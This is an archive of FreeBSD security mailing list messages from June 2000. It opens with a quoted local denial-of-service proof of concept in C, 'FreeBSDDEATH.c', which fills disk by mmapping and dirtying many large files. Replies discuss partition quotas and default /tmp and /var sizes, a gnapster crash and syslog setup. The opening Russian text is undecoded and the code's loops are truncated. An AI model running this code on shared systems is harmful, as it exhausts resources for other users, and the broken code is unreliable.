=D3=C2=D2=CF=D3=C5 =CB=CF=D4=CF=D2= =CF=CA =D0=D2=CF=C9=DA=CF=DB=CC=C1 =CF=DB=C9=C2=CB=C1, =D7=C5=D3=D8=CD=C1 = =DA=C1=D4=D2=D5=C4=CE=C9=D4=C5=CC=D8=CE=CF. > =F7=CF=D4 =D3=C9=D6=D5 =D3=C5=CA=DE=C1=D3, =CC=CF=CD=C1=C0 =C7=CF=CC=CF= =D7=D5, =DE=D4=CF =C4=C5=CC=C1=D4=D8... > =20 > =EB=D3=D4=C1=D4=C9, =C1 =DA=C4=C5=D3=D8 =CE=C9=CB=D4=CF =CE=C5 =DA=C1=CE= =C9=CD=C1=C5=D4=D3=D1 =D1=C4=C5=D2=CE=D9=CD VM ? > */ > =20 > #include > #include > #include > #include > #include > #include > =20 > #define COUNT 1024*1024 > #define SIZE 10*1024*1024 > =20 > int main () { > int i,j,fd; > char *fptr, fname [16]; > =20 > for (i=3D0;i sprintf (fname, "%d", i); > printf ("DEBUG: fname: %s\n", fname); fflush (stdout); > =20 > fd=3Dopen (fname, O_RDWR|O_CREAT, 644); > lseek (fd, SIZE, SEEK_SET); > write (fd, "-", 1); > printf ("DEBUG: write\n"); fflush (stdout); > =20 > if ((fptr=3Dmmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, = fd, > 0))=3D=3DMAP_FAILED) { > printf ("mmap() failed !\n"); fflush (stdout); > return 0; > } > printf ("DEBUG: mmap, errno=3D%d\n", errno); fflush (stdout); > =20 > for (j=3D0;j fptr[j]=3D'o'; > printf ("DEBUG: fill\n"); fflush (stdout); > } > =20 > return 0; > } _______________________________________________________ Get 100% FREE Internet Access powered by Excite Visit http://freelane.excite.com/freeisp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 12:29:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 72B5537BE03 for ; Fri, 2 Jun 2000 12:29:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA14770; Fri, 2 Jun 2000 13:28:47 -0600 (MDT) Message-Id: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 02 Jun 2000 13:26:57 -0600 To: Matthew Dillon , Mike Tancsa From: Brett Glass Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200006021608.JAA47864@apollo.backplane.com> References: <3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:08 AM 6/2/2000, Matthew Dillon wrote: > I put quotas on every partition users had access to at BEST, including > /tmp (100MB quota). In fact, /tmp turned out to be the single most > important partition to put a quota on due to the sheer number of > programs that just assumed it would never fill up (and the sheer number > of bozo users who would use /tmp to unpack warez and never delete any > of it). An interesting related point: By default, the current sysinstall doesn't create a separate /tmp. It leaves /tmp as a directory in the rather small root partition. An action as simple as downloading a large file via Lynx (which downloads to /tmp and then moves files to a destination) is enough to overflow the root partition. Has thought been given to changing this? If not, perhaps it should be submitted as a PR. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 13:50:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id AE8D937B6E6 for ; Fri, 2 Jun 2000 13:50:14 -0700 (PDT) (envelope-from matt@ARPA.MAIL.NET) Received: (qmail 10662 invoked by uid 1000); 2 Jun 2000 20:50:12 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Jun 2000 20:50:12 -0000 Date: Fri, 2 Jun 2000 16:50:09 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Brett Glass Cc: Matthew Dillon , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) In-Reply-To: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 2 Jun 2000, Brett Glass wrote: [...] : An interesting related point: By default, the current sysinstall doesn't : create a separate /tmp. It leaves /tmp as a directory in the rather small : root partition. An action as simple as downloading a large file via Lynx : (which downloads to /tmp and then moves files to a destination) is : enough to overflow the root partition. I would like to see a system where it choose defaults based on two classes, we'll call them "workstation" and "server" for the purpose of this discussion. The defaults now are fairly decent for a workstation with the addition of /tmp mentioned herein. However, I've see alot of people new to FreeBSD get bit HARD by those defaults especially in any system that delivers e-mail to /var/mail. The default for /var is horribly low, I never did understand that myself. It would be nice to say "are you are server or workstation" and then spit out some better default variables based on the answer. : Has thought been given to changing this? If not, perhaps it should be : submitted as a PR. Not a bad idea at all. : --Brett Matt Heckaman matt@arpa.mail.net http://www.lucida.qc.ca -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5OB4EdMMtMcA1U5ARAsYXAJ9X/IhwU5jmlwnOF5DjbemEb3qEmwCcCokq I7DlStGUalEC/VbXmH18jy4= =vGaf -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 13:58:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 80E2B37B520 for ; Fri, 2 Jun 2000 13:58:47 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 12xyWf-0004Cf-00 for freebsd-security@FreeBSD.ORG; Fri, 02 Jun 2000 16:58:41 -0400 Date: Fri, 2 Jun 2000 16:58:40 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602165840.I3641@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from matt@ARPA.MAIL.NET on Fri, Jun 02, 2000 at 04:50:09PM -0400 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Heckaman probably said: > However, I've see alot of people new to FreeBSD get bit HARD by those > defaults especially in any system that delivers e-mail to /var/mail. The > default for /var is horribly low, I never did understand that myself. It > would be nice to say "are you are server or workstation" and then spit out > some better default variables based on the answer. It's not unreasonable to expect, in my opinion, that someone who is installing a "server" know enough to change the defaults. I've never used the default layouts. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 15:42:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from reddog.yi.org (ls-tc01-13.nothinbut.net [207.44.35.27]) by hub.freebsd.org (Postfix) with ESMTP id ACC9837C06C for ; Fri, 2 Jun 2000 15:42:33 -0700 (PDT) (envelope-from ai32@drexel.edu) Received: from reddog.yi.org (localhost [127.0.0.1]) by reddog.yi.org (Postfix) with SMTP id 2879257C; Fri, 2 Jun 2000 18:43:32 -0500 (EST) From: specter To: Fernando Schapachnik Subject: Re: gnapster dos(?) Date: Fri, 2 Jun 2000 18:39:45 -0500 X-Mailer: Unknown Abusive Thing Content-Type: text/plain Cc: freebsd-security@FreeBSD.ORG References: <200006021152.IAA24368@ns1.via-net-works.net.ar> In-Reply-To: <200006021152.IAA24368@ns1.via-net-works.net.ar> MIME-Version: 1.0 Message-Id: <00060218433200.01590@reddog.yi.org> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 02 Jun 2000, Fernando Schapachnik wrote: > If I'm not wrong this was published in bugtraq a while ago... > > Regards! [...] If you are referring to FreeBSD-SA-00:18, that's a different thing. The issue there was that anyone could read any file (with the UID of the person running gnapster) on the system. This is a DoS, it crashes gnapster. P.S. The vulnerability you are referring to was fixed in 1.3.9 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 21:14:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f29.law9.hotmail.com [64.4.9.29]) by hub.freebsd.org (Postfix) with SMTP id 5ABE737B59D for ; Fri, 2 Jun 2000 21:14:33 -0700 (PDT) (envelope-from jasonschwab@hotmail.com) Received: (qmail 2548 invoked by uid 0); 3 Jun 2000 04:14:31 -0000 Message-ID: <20000603041431.2547.qmail@hotmail.com> Received: from 216.184.27.78 by www.hotmail.com with HTTP; Fri, 02 Jun 2000 21:14:31 PDT X-Originating-IP: [216.184.27.78] From: "jason schwab" To: freebsd-security@freebsd.org, petef@databits.net, ghandi@mindless.com, amb78@nmia.com, nmlug@swcp.com Subject: Syslog question... Date: Fri, 02 Jun 2000 23:14:31 EST Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heya everyone; I am going to have two public machines; and one machine that will do nothing except be a backup of syslog from both the public machines. on the syslog backup machine; is there any way to have different files from the logs coming from the different hosts? I dont want all the logs from both machines into the same files on to the logging backup machine.... Any ideas? Thanks... ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 3 2:36:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id BDEB937B938 for ; Sat, 3 Jun 2000 02:36:07 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.9.3/8.9.3) with SMTP id LAA40378 for ; Sat, 3 Jun 2000 11:35:21 +0200 (EET) (envelope-from narvi@haldjas.folklore.ee) Date: Sat, 3 Jun 2000 11:35:20 +0200 (EET) From: Narvi To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) In-Reply-To: <20000602165840.I3641@pir.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 2 Jun 2000, Peter Radcliffe wrote: > Matt Heckaman probably said: > > However, I've see alot of people new to FreeBSD get bit HARD by those > > defaults especially in any system that delivers e-mail to /var/mail. The > > default for /var is horribly low, I never did understand that myself. It > > would be nice to say "are you are server or workstation" and then spit out > > some better default variables based on the answer. > > It's not unreasonable to expect, in my opinion, that someone who is > installing a "server" know enough to change the defaults. > > I've never used the default layouts. Which is way too much to assume. > > P. > > -- > pir pir@pir.net pir@net.tufts.edu > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 3 11:24:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 15E2437B7C3 for ; Sat, 3 Jun 2000 11:24:28 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (Foolstrustident!@homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id MAA11658; Sat, 3 Jun 2000 12:24:15 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <39394E2E.3706C561@softweyr.com> Date: Sat, 03 Jun 2000 12:27:58 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Matt Heckaman Cc: Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Heckaman wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Fri, 2 Jun 2000, Brett Glass wrote: > [...] > : An interesting related point: By default, the current sysinstall doesn't > : create a separate /tmp. It leaves /tmp as a directory in the rather small > : root partition. An action as simple as downloading a large file via Lynx > : (which downloads to /tmp and then moves files to a destination) is > : enough to overflow the root partition. > > I would like to see a system where it choose defaults based on two > classes, we'll call them "workstation" and "server" for the purpose of > this discussion. The defaults now are fairly decent for a workstation with > the addition of /tmp mentioned herein. > > However, I've see alot of people new to FreeBSD get bit HARD by those > defaults especially in any system that delivers e-mail to /var/mail. The > default for /var is horribly low, I never did understand that myself. It > would be nice to say "are you are server or workstation" and then spit out > some better default variables based on the answer. Actually the defaults are ridiculous in the days of 6GB disks being hard to find. I use 128MB root and var partitions on small laptops. I do think it would be of value to ask quite early in the installation if this is intended to be a workstation or server configuration and suggest different defaults for such things throughout the install. As always, we await your patches. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message